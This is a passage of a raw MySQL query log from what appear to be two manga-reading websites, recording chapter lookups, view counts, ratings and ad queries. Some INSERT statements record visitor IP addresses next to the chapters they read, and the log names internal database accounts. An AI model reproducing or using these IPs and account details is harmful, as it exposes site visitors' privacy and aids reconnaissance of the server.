total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330656563 Quit 330656564 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656564 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330656564 Quit 330656565 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656565 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330656565 Quit 330656566 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656566 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330656566 Quit 330656567 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656567 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330656567 Quit 330656568 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656547 Quit 330656568 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '303' order by created desc 330656568 Quit 330656569 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656570 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656569 Query Update chapters set view=view+1 where id = '9894' 330656571 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656570 Quit 330656571 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330656571 Quit 330656569 Quit 330656572 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656572 Query select * FROM chapters where id = '9894' 330656573 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656572 Quit 330656573 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '9894' 330656573 Quit 330656574 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656574 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('58', '9894', '2607:fb90:74af:c0df:c818:7dd0:7152:f2ef', 'mangacherri.com', '2026-02-26 03:29:45', '2026-02-26 03:29:45') 330656574 Quit 330656575 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656575 Query select * FROM chapter_images where chapter_id = '9894' 330656575 Quit 330656576 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656576 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '58' and m.active = 1 330656577 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656576 Quit 330656577 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='58' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shounen%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330656578 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656579 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656578 Quit 330656579 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '3158' and m.active = 1 330656579 Quit 330656580 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656580 Query select * FROM chapters where id = '3158' 330656580 Quit 330656581 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656581 Query select * FROM chapters where manga_id = '124' order by display_priority ASC, id desc 330656581 Quit 330656582 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656582 Query Update chapters set view=view+1 where id = '3158' 330656582 Quit 330656583 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656583 Query select * FROM chapters where id = '3158' 330656584 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656583 Quit 330656584 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '3158' and m.active = 1 330656584 Quit 330656585 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656585 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('124', '3158', '47.79.206.200', 'mangaberri.com', '2026-02-26 03:29:45', '2026-02-26 03:29:45') 330656585 Quit 330656586 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656586 Query select * FROM chapter_images where chapter_id = '3158' 330656586 Quit 330656587 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656587 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '124' and m.active = 1 330656587 Quit 330656588 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656588 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='124' and m.active = 1 AND (genres like '%Adventure%' OR genres like '%Comedy%' OR genres like '%Drama%' OR genres like '%Fantasy%' OR genres like '%Super Power%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 260225 19:29:46 330656588 Quit 330656589 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656590 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656589 Quit 330656590 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330656590 Quit 330656591 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656592 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656591 Quit 330656592 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330656592 Quit 330656593 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656594 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656593 Quit 330656594 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330656594 Quit 330656595 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656596 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656595 Quit 330656596 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330656596 Quit 330656597 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656598 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656597 Quit 330656598 Query select k.* from (select m.*, count(r.id) as total_rating, (sum(r.rating) / count(r.id)) as average_rating, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM ratings as r join mangas as m on (m.id = r.manga_id) group by r.manga_id) as k ORDER BY RAND() DESC limit 10 330656599 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656600 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656599 Quit 330656600 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12439' 330656600 Quit 330656601 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656601 Query select * FROM chapters where id = '12439' 330656601 Quit 330656602 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656602 Query select * FROM chapters where manga_id = '239' order by id desc 330656602 Quit 330656603 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656603 Query Update chapters set view=view+1 where id = '12439' 330656603 Quit 330656604 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656604 Query select * FROM chapters where id = '12439' 330656604 Quit 330656605 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656605 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12439' 330656605 Quit 330656606 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656606 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('239', '12439', '142.44.233.14', 'mangacherri.com', '2026-02-26 03:29:46', '2026-02-26 03:29:46') 330656606 Quit 330656607 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656607 Query select * FROM chapter_images where chapter_id = '12439' 330656607 Quit 330656608 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656608 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '239' and m.active = 1 330656608 Quit 330656609 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656609 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='239' and m.active = 1 AND (genres like '%Animals%' OR genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%Shounen%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330656610 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656611 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656610 Quit 330656611 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '3158' and m.active = 1 330656611 Quit 330656612 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656612 Query select * FROM chapters where id = '3158' 330656612 Quit 330656613 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656613 Query select * FROM chapters where manga_id = '124' order by display_priority ASC, id desc 330656613 Quit 330656614 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656614 Query Update chapters set view=view+1 where id = '3158' 330656614 Quit 330656615 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656615 Query select * FROM chapters where id = '3158' 330656616 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656616 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '3158' and m.active = 1 330656615 Quit 330656616 Quit 330656617 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656617 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('124', '3158', '47.79.206.200', 'mangaberri.com', '2026-02-26 03:29:46', '2026-02-26 03:29:46') 330656617 Quit 330656618 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656618 Query select * FROM chapter_images where chapter_id = '3158' 330656618 Quit 330656619 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656619 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '124' and m.active = 1 330656619 Quit 330656620 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656620 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='124' and m.active = 1 AND (genres like '%Adventure%' OR genres like '%Comedy%' OR genres like '%Drama%' OR genres like '%Fantasy%' OR genres like '%Super Power%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330656620 Quit 330656621 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656622 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656621 Quit 330656622 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330656622 Quit 330656623 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656624 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656623 Quit 330656624 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330656624 Quit 330656625 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656626 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656625 Quit 330656626 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330656626 Quit 330656627 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656628 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656627 Quit 330656628 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330656628 Quit 330656577 Quit 330656629 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656630 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656629 Quit 330656630 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330656630 Quit 330656631 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656632 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656631 Quit 330656632 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330656632 Quit 330656633 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656634 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656633 Quit 330656634 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330656634 Quit 330656635 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656636 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656635 Quit 330656636 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330656636 Quit 330656609 Quit 330656598 Quit 330656637 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656637 Query select max(c.id) as chapter_id, m.* from chapters as c join mangas as m on (m.id = c.manga_id) where m.active = 1 group by m.id order by chapter_id desc limit 30 330656638 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656639 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656638 Quit 330656639 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330656639 Quit 330656640 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656641 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656640 Quit 330656641 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330656641 Quit 330656642 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656643 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656642 Quit 330656643 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330656643 Quit 330656644 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656645 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656644 Quit 330656645 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330656645 Quit 330656646 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656647 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656646 Quit 330656647 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12398' and m.active = 1 330656637 Quit 330656647 Quit 330656648 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656649 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656648 Query SELECT stats.total_view, stats.latest_chapter_id, latest_chapter.name AS latest_chapter, m.* FROM ( SELECT c.manga_id, SUM(c.view) AS total_view, MAX(c.id) AS latest_chapter_id FROM chapters AS c GROUP BY c.manga_id ) AS stats JOIN chapters AS latest_chapter ON latest_chapter.id = stats.latest_chapter_id JOIN mangas AS m ON m.id = stats.manga_id WHERE m.active = 1 ORDER BY stats.total_view DESC 330656649 Query select * FROM chapters where id = '12398' 330656649 Quit 330656650 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656650 Query select * FROM chapters where manga_id = '275' order by display_priority ASC, id desc 330656650 Quit 330656651 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656651 Query Update chapters set view=view+1 where id = '12398' 330656651 Quit 330656652 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656652 Query select * FROM chapters where id = '12398' 330656652 Quit 330656653 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656653 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12398' and m.active = 1 330656654 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656654 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('275', '12398', '47.79.200.64', 'mangaberri.com', '2026-02-26 03:29:46', '2026-02-26 03:29:46') 330656653 Quit 330656654 Quit 330656655 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656655 Query select * FROM chapter_images where chapter_id = '12398' 330656655 Quit 330656656 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656656 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '275' and m.active = 1 330656656 Quit 330656657 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656657 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='275' and m.active = 1 AND (genres like '%Action%' OR genres like '%Adventure%' OR genres like '%Crime%' OR genres like '%Drama%' OR genres like '%Fantasy%' OR genres like '%Manhwa/Manhua%' OR genres like '%Martial Arts%' OR genres like '%Shounen%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330656657 Quit 330656658 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656659 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656658 Quit 330656659 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330656659 Quit 330656660 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656661 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656661 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330656660 Quit 330656661 Quit 330656662 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656663 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656663 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330656663 Quit 330656662 Quit 330656664 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656665 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656664 Quit 330656665 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330656665 Quit 330656648 Quit 330656666 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656666 Query select k.* from (select m.*, count(r.id) as total_rating, (sum(r.rating) / count(r.id)) as average_rating, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM ratings as r join mangas as m on (m.id = r.manga_id AND m.status = 'Finished') group by r.manga_id) as k ORDER BY k.id DESC 330656667 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656668 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656667 Quit 330656668 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12934' and m.active = 1 330656668 Quit 330656669 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656669 Query select * FROM chapters where id = '12934' 330656669 Quit 330656670 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656670 Query select * FROM chapters where manga_id = '116' order by display_priority ASC, id desc 330656670 Quit 330656671 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656671 Query Update chapters set view=view+1 where id = '12934' 330656671 Quit 330656672 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656672 Query select * FROM chapters where id = '12934' 330656672 Quit 330656673 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656673 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12934' and m.active = 1 330656673 Quit 330656674 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656674 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('116', '12934', '122.179.91.40', 'mangaberri.com', '2026-02-26 03:29:46', '2026-02-26 03:29:46') 330656674 Quit 330656675 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656675 Query select * FROM chapter_images where chapter_id = '12934' 330656675 Quit 330656676 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656676 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '116' and m.active = 1 330656676 Quit 330656677 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656677 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='116' and m.active = 1 AND (genres like '%Action%' OR genres like '%Comedy%' OR genres like '%Demons%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330656677 Quit 330656678 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656679 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656678 Quit 330656679 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330656679 Quit 330656680 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656681 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656680 Quit 330656681 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330656681 Quit 330656682 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656683 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656682 Quit 330656683 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330656683 Quit 330656684 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656685 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656684 Quit 330656685 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330656685 Quit 330656666 Quit 330656686 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656687 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656687 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330656686 Quit 330656687 Quit 330656688 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656688 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330656688 Quit 330656689 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656689 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330656689 Quit 330656690 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656690 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330656690 Quit 330656691 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656691 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330656691 Quit 330656692 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656692 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330656692 Quit 330656693 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656693 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330656693 Quit 330656694 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656694 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330656694 Quit 330656695 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656695 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330656695 Quit 330656696 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656696 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330656696 Quit 330656697 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656697 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330656697 Quit 330656698 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656698 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330656698 Quit 330656699 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656699 Query select * FROM chapters where manga_id = '387' order by created desc limit 1 330656699 Quit 330656700 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656700 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330656700 Quit 330656701 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656701 Query select * FROM chapters where manga_id = '272' order by created desc limit 1 330656701 Quit 330656702 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656702 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330656702 Quit 330656703 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656703 Query select * FROM chapters where manga_id = '361' order by created desc limit 1 330656703 Quit 330656704 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656704 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330656704 Quit 330656705 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656705 Query select * FROM chapters where manga_id = '57' order by created desc limit 1 330656705 Quit 330656706 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656706 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330656706 Quit 330656707 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656707 Query select * FROM chapters where manga_id = '285' order by created desc limit 1 330656707 Quit 330656708 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656708 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330656708 Quit 330656709 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656709 Query select * FROM chapters where manga_id = '104' order by created desc limit 1 330656709 Quit 330656710 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656710 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330656710 Quit 330656711 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656711 Query select * FROM chapters where manga_id = '290' order by created desc limit 1 330656712 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656711 Quit 330656712 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330656712 Quit 330656713 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656713 Query select * FROM chapters where manga_id = '40' order by created desc limit 1 330656713 Quit 330656714 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656714 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330656714 Quit 330656715 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656715 Query select * FROM chapters where manga_id = '386' order by created desc limit 1 330656715 Quit 330656716 Connect mangauser@localhost on 